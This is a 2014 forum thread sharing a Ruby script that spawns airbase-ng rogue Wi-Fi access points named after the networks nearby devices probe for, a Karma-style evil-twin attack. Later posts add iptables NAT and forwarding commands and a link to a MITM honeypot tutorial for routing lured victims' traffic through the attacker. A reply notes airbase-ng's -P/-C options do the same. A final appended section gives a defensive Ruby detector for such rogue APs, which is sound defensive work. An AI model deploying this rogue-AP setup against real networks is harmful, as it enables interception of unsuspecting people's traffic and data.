i8igmac Posted March 13, 2014

Karma was trouble to install on my machine, I didn't feel like booting BT... so here is a fake AP script... it will capture clients' probe requests and start a new ESSID...

```ruby
# First start: airodump-ng wlan0 -w airbase
# This simply scans the airbase-01.csv file for client probes.
@pid_list = [] # this will hold the list of running ESSIDs: "netgear", "freewifi", "cisco"

# Read the airodump CSV file and sort through the clients.
def refresh_list
  block = File.read("airbase-01.csv")
  cut = block.index("\r\n\r\n")
  return if cut.nil? # client section not written yet
  block_1 = block[146..cut]          # here is your list of access points...
  block_2 = block[cut + 90..-1].to_s # here is your list of clients
  buff = []
  block_2.each_line { |x| buff << x.split(",")[5..-1] }
  buff.uniq.each do |x|
    next if x.nil?
    x.each do |y|
      next if y.include?(":") || y.include?("(not associated)")
      z = y.strip # String#map no longer exists (Ruby 1.9+); strip the field directly
      next if z.empty? || @pid_list.include?(z)
      # The ESSID is whatever a nearby device probed for, so pass it as an
      # argument list; the interpolated string form would hand it to a shell.
      Thread.start { system("airbase-ng", "wlan0", "-e", z) }
      @pid_list << z
    end
  end
end

refresh_list
while true
  sleep 10
  refresh_list
end
```

i8igmac Posted March 14, 2014 (Author)

Maybe some help setting up DHCP. I have nothing but problems with dhcpd3... maybe some simple alternatives.

Laptop has 2 wifi devices.

Wlan1 is connected to droid 4g 192.168.43.130

Wlan0 will be airbase-ng, so should I set ifconfig at0 192.168.44.1 up?

Also, how would you configure dhcp 192.168.0.100-250???

i8igmac Posted March 16, 2014 (Author)

I had to boot up Kali to get a working example of a fake AP with dnsmasq... simply follow this tutorial

http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html

and don't forget to add iptables to complete your clients' internet connection.

wlan1 has established a connection to my droid hotspot 4g network... at0 traffic will now pass through

```
iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
```

Edited March 16, 2014 by i8igmac

phpsystems Posted March 26, 2014

Cool script, but have you seen airbase-ng's -P option? My understanding is that it would do much the same thing.

From the web page (http://www.aircrack-ng.org/doku.php?id=airbase-ng):

-P All Probes

This causes the fake access point to respond to all probes regardless of the ESSIDs specified. Without -P, the old behavior of ignoring probes for non-matching ESSIDs will be used.

Also,

-C Seconds

The -P option must also be specified in order to use this option. The wildcard ESSIDs will also be beaconed this number of seconds. A good typical value to use is "-C 60".

When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen by the directed probes. This allows one client which is probing for a network to result in a beacon for the same network for a brief period of time (the -C parameter, which is the number of seconds to broadcast new probe requests). This works well when some clients are sending directed probes, while others listen passively for beacons. A client which does directed probes results in a beacon which wakes up the passive client and causes the passive client to join the network as well. This is especially useful with Vista clients (which listens passively for beacons in many cases) which share the same WiFi network as Linux/Mac OS X clients which send directed probes.
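
For the defensive side of what the script and the -P/-C options above do, this added example (not from any poster in this thread or from the aircrack-ng project) reads the same airodump-ng CSV and flags open access points whose ESSID a nearby client was already probing for before the AP first appeared. The sample rows, MAC addresses and the function names `parse_airodump` and `suspicious_aps` are constructed for illustration; a match is a lead to check, since a legitimate open hotspot coming into range looks the same.

```ruby
require "time"

# Constructed sample in airodump-ng's CSV layout (not a real capture).
SAMPLE = <<~CSV

  BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
  00:11:22:33:44:55, 2014-03-13 10:00:00, 2014-03-13 10:09:00,  6,  54, WPA2, CCMP, PSK, -40, 900, 0, 0.0.0.0, 7, homenet,
  02:AA:BB:CC:DD:01, 2014-03-13 10:05:10, 2014-03-13 10:09:00,  6,  54, OPN, , , -30, 50, 0, 0.0.0.0, 8, freewifi,

  Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
  66:77:88:99:AA:BB, 2014-03-13 10:05:00, 2014-03-13 10:09:00, -50, 12, (not associated) , freewifi,netgear
  CC:DD:EE:FF:00:11, 2014-03-13 10:01:00, 2014-03-13 10:09:00, -55, 30, 00:11:22:33:44:55, homenet
CSV

# Split the file on its two header rows instead of fixed byte offsets.
# Limitation: airodump-ng does not escape commas inside ESSIDs.
def parse_airodump(csv)
  aps, stations, section = [], [], nil
  csv.each_line do |line|
    f = line.strip.split(",").map(&:strip)
    next if f.empty?
    if f[0] == "BSSID" then section = :ap
    elsif f[0] == "Station MAC" then section = :sta
    elsif section == :ap && f.size >= 14
      aps << { bssid: f[0], first: Time.parse(f[1]), privacy: f[5], essid: f[13] }
    elsif section == :sta && f.size >= 6
      stations << { mac: f[0], first: Time.parse(f[1]),
                    probes: f[6..-1].to_a.reject(&:empty?) }
    end
  end
  [aps, stations]
end

# Heuristic: an open AP whose ESSID matches a directed probe from a station
# that was on the air before the AP was first seen. airodump-ng does not
# timestamp individual probes, so the station's first-seen time stands in.
def suspicious_aps(aps, stations)
  aps.select { |ap| ap[:privacy] == "OPN" }.map do |ap|
    probers = stations.select { |s| s[:probes].include?(ap[:essid]) && s[:first] <= ap[:first] }
    next if probers.empty?
    { essid: ap[:essid], bssid: ap[:bssid], probed_by: probers.map { |s| s[:mac] } }
  end.compact
end

if __FILE__ == $0
  aps, stations = parse_airodump(SAMPLE)
  suspicious_aps(aps, stations).each do |h|
    puts "#{h[:essid]} (#{h[:bssid]}) appeared after probes from #{h[:probed_by].join(', ')}"
  end
end
```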